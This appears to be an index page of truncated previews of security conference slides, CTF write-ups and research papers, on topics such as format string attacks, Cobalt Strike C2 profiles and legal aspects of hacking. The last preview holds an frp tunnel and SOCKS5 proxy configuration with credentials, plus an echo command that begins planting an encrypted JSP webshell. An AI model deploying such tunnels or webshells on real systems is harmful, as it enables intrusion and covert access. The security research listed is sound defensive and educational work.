​ ​ ​ pipestdin 0x00 0x01 0x02 1-writestdin 0x03 2-pipestdin ​ ​ ​ 0x04 ​ ​ ​ ​ ​ ​ ​ ​ ​ 0x05
pdf
2005 Hex-Rays was founded 2015 ??? 2007 Hex-Rays Decompiler 1.0 2009 Hex-Rays IDA 5.5 2013 Hex-Rays IDA 6.4 2011 Hex-Rays IDA 6.1 ● ● ● ● ● ● ❏ ❏ … ❏ ❏ ❏ ❏ ❏ ❏ x = int(input()) if x >= 10: if x < 100: print "Two!" else: print "Lots!" else: print "One!" x = int(input()) if x >= 10: if x < 100: print "Two!" else: print "...
pdf
Jokes, vulnerabilities, and analysis of commit statements Logan Lodge and Bruce Potter l0l0@shmoo.com gdead@shmoo.com   What’s the only thing you should believe?   Ever checked something in to your repository with statements like “this need to be fixed” knowing damn well you never will go back and fix it? ...
pdf
The Future of Cybertravel: Legal Implications of the Evasion of Geolocation Marketa Trimble Marketa Trimble What is this talk about?   What the law has (or does not have) to say about evasion of geolocation or “cybertravel” – about acts by which a user makes geolocation tools believe that he is physically lo...
pdf
Introduction SEH Basics Anti-RE Techniques Decrypting the Content Anti-RE Techniques in DRM Code Jan Newger Seminar on Advanced Exploitation Techniques i4, RWTH Aachen, Germany DEF CON 16 / 2008 Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Outline 1 Introdu...
pdf
Interview with Joe McMoneagle on June 5, 2001 RT: The people I speak to seem to accept the extraterrestrial hypothesis as the least unlikely, and when so many people of this caliber take it seriously, I am suggesting that we should too ... how would you define your understanding of or relationship to UFO phenomena? JM:...
pdf
Advanced Format String Attacks Presented by Paul Haas Contents • Background • Abstract • Definition • Context • Technique • How-to • Tools • Exploits • Conclusion • Q&A Background • Lead Web Application Security Engineer at Redspin, Inc with over 4 years experience in hundreds of audits. • This talk is no...
pdf
What are we talking about here? Anti-hacking law Communications law Intellectual property Criminal procedure Computer Fraud and Abuse Act (18 U.S.C. §1030) This is the federal anti-hacking law. Most states have something similar, too. CFAA basic prohibitions •  Accessing a government computer without auth...
pdf
LTE Recon and Tracking with RTLSDR An SDR SIGINT Primer Ian Kline Wolf Den Associates ian@wolfdenassociates.com PGP Public Key Lead: “Emissions Inspection”, Red Teams, Web App Pentests, Forensic Analyst, Hacker for Hire whoami Why should you listen Need a PoC quickly - start with open source research - integrate wit...
pdf
使用CobaltStrike从学习C2profile开始 0x00 前言 我一直是CS的忠实粉丝,随着CS4.4的发布,增加了反射DLL的自定义功能,让CS越来越高度可定制化 了。完全没有必要因为防御方的各种查杀CS而放弃CS,转而选择其他C2,或者自己编写C2。当然我也 认可在一次高对抗的红队行动中,前锋马、潜伏马是必不可少的,多备几套C2方案也没有问题。 如果你在行动中,在流量层被查杀,那么你一定是没有用好C2profile。我不打算一一解释C2profile的参 数的意义,因为官方文档很详细了https://www.cobaltstrike.com/help-malleable-c2,也可以阅读http s://github....
pdf
Penal Codes Relevant to Computer Crime in various Countries United States: Sec. 33.01. DEFINITIONS. In this chapter: (1) "Access" means to approach, instruct, communicate with, store data in, retrieve or intercept data from, alter data or computer software in, or otherwise make use of any resource of a comput...
pdf
Breaking Google Home: Exploit It with SQLite(Magellan) Wenxiang Qian, Yuxiang Li, Huiyu Wu Tencent Blade Team About Us Wenxiang Qian (@leonwxqian) Senior security researcher at Tencent Blade Team. Focus on browser security & IoT security Interested in code auditing. Security book author. Speaker of DEF CON 26, CSS 20...
pdf
CTF WriteUp By Nu1L Author:Nu1L CTF WriteUp By Nu1L WEB carefuleyes simpleflask ezflask sssrfme babyshop XWIKI say hello to the world PWN vmpwn sandbox card babyqemu Reverse PicCompress Checkin EasyRe Simulator WannaFlag InfaintRe Misc signin oldmodem trihistory crymisc RIG capture v for Vendetta GACTF FeedBack Crypto ...
pdf
Toxic Proxies - Bypassing HTTPS & VPNs to pwn your online identity Alex Chapman @noxrnet Paul Stone @pdjstone Introduction Our Talk Exciting introduction Some history – SSL, PAC, WPAD, sslstrip, HSTS The PAC Attack – bypassing HTTPS – Sniffing your traffic – Stealing your data – Stealing your accounts T...
pdf
The spear to break the security wall of S7CommPlus Cheng Lei, Li Donghong, Ma Liang NS-Focus Abstract. Siemens PLCs was widely used in industrial control system(ICS). The new version of Siemens PLCs like S7-1500 and S7-1200v4.0 used an encrypted protocol names S7CommPlus to prevent replay attacks. In this paper, ...
pdf
1 Humor – Your Adversaries 2 This is how your adversaries envision their DDoS attacks on your webserver: Humor – Your Webserver 3 This is how your webserver will respond after implementing some of the defensive strategies that this talk will cover: Background •  Personal –  Blake currently works as a senior s...
pdf
Understanding the Web browser threat: Examination of vulnerable online Web browser populations and the "insecurity iceberg" Stefan Frei1, Thomas Duebendorfer2, Gunter Ollmann3, Martin May1 1 Communication Systems Group, ETH Zurich, Switzerland 2 Google Switzerland GmbH 3 IBM Internet Security Systems, USA Contact: inse...
pdf
Asleep at the Keyboard? Assessing the Security of GitHub Copilot’s Code Contributions Hammond Pearce Department of ECE New York University Brooklyn, NY, USA hammond.pearce@nyu.edu Baleegh Ahmad Department of ECE New York University Brooklyn, NY, USA ba1283@nyu.edu Benjamin Tan Department of ESE University of Calgary Ca...
pdf
*CTF WriteUp By Nu1L Author: Nu1L *CTF WriteUp By Nu1L Pwn examination BabyNote Ping Reverse Simple File System NaCL Jump Misc Alice's warm up Today BabyFL Alice's challenge checkin Web oh-my-grafana oh-my-notepro oh-my-lotto oh-my-lotto-revenge Crypto ezRSA InverseProblem2 Pwn examination from pwn import * r = lambda ...
pdf
Deceptive Hacking How misdirection can be used to steal information without being detected Bruce “Grymoire” Barnett Magician & Computer Scientist Magicians and hackers have a lot in common • They like to wear black • They like to “shock” people • They have Secret Knowledge Assumptions .umptions Ass… Mag...
pdf
The Psychology of Security—DRAFT June 28, 2007 Bruce Schneier 13544 words Introduction Security is both a feeling and a reality. And they’re not the same. The reality of security is mathematical, based on the probability of different risks and the effectiveness of different countermeasures. We can calculate ho...
pdf
Mobile Privacy: Tor On The iPhone And Other Unusual Devices Marco Bonetti - CutAway s.r.l. whoami Marco Bonetti Security Consultant @ CutAway s.r.l. mbonetti@cutaway.it http://www.cutaway.it/ Tor user & researcher @ SLP-IT http://sid77.slackware.it/ http://www.slackware.it/ http://twitter.com/_sid77/ Outline Mobile P...
pdf
[common] bind_port = 9001 [common] server_addr = server_port = 9001 #Web [socks5] type = tcp remote_port = 8088 plugin = socks5 use_encryption = true use_compression = true #socks5 plugin_user = test plugin_passwd = pentest123 echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^>^<%!class U extend...
pdf